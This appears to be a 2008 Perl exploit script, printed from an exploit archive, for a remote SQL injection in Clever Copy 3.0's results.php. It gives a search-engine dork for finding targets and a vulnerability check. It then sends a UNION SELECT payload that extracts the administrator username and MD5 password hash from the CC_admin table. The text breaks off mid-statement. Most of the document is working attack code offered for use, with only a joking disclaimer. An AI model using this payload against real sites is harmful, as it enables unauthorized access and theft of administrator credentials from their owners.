1 #!/usr/bin/perl
2 ######################
3 #
4 #Clever Copy (results.php) Remote SQL Injection Exploit
5 #
6 ######################
7 #
8 #Bug by: h0yt3r
9 #
10 #Dork: "powered by Clever Copy"
11 #
12 ##
13 ###
14 ##
15 #
16 #This simple Exploit will give you Admin Username and md5(Password)
17 #Pls don’t use this to crack sites :P
18 #
19 #Gr33tz go to:
20 #thund3r, ramon, b!zZ!t, Free−Hack, Sys−Flaw and of course the ultimate h4ck−y0u Team
21 #
22
23 use LWP::UserAgent;
24 my $userAgent = LWP::UserAgent−>new;
25
26 usage();
27
28 $server = $ARGV[0];
29 $dir = $ARGV[1];
30
31 print"\n";
32 if (!$dir) { die "Read Usage!\n"; }
33
34 $filename ="results.php";
35 my $url = "http://".$server.$dir.$filename;
36
37 my $Attack= $userAgent−>get($url);
38 if ($Attack−>is_success)
39 {
40 print "[x] Attacking ".$url."\n";
41 }
42 else
43 {
44 print "Couldn’t connect to ".$url."!";
45 exit;
46 }
47
48 print "[x] Vulnerable Check:";
49
50 my $check = $url."?%73%74%61%72%74%3D%30%26%73%65%61%72%63%68%74%65%72%6D%3D%43%43%4E%65%77%73%26%73%65%61%72%63%6
8%74%79%70%65%3D%27";
51
Page 1/3
Clever Copy 3.0 results.php Remote SQL Injection Exploit
n/a
06/12/2008
52 my $Attack= $userAgent−>get($check);
53 if($Attack−>content =~ m/You have an error in your SQL syntax/i)
54 {
55 print " Vulnerable!\n";
56 }
57 else
58 {
59 print " Not Vulnerable!";
60 exit;
61 }
62
63 print "[x] Injecting Black Magic\n";
64
65 my $Injection = "?start=0&searchterm=CCNews&searchtype=category union select 1,2,3,4,5,6,concat(char(104,48,121,116,51,114),username,0x3a,password,char(10
4,48,121,116,51,114)),8,9,10,11,12,13,14,15,16,17 from CC_admin/*";
66
67 my $Final = $url."?seiten_id=461&sprache_id=1".$Injection;
68 my $Attack= $userAgent−>get($Final);
69
70 if($Attack−>content =~ m/<br>h0yt3r(.*?):(.*?)h0yt3r<br>/i)
71 {
72 my $login = $1;
73 my $pass = $2;
74 print "[x] Success!\n";
75 print "[x] Admin Details:\n";
76
77 print " Username: ".$login."\n";
78 print " Password: ".$pass."\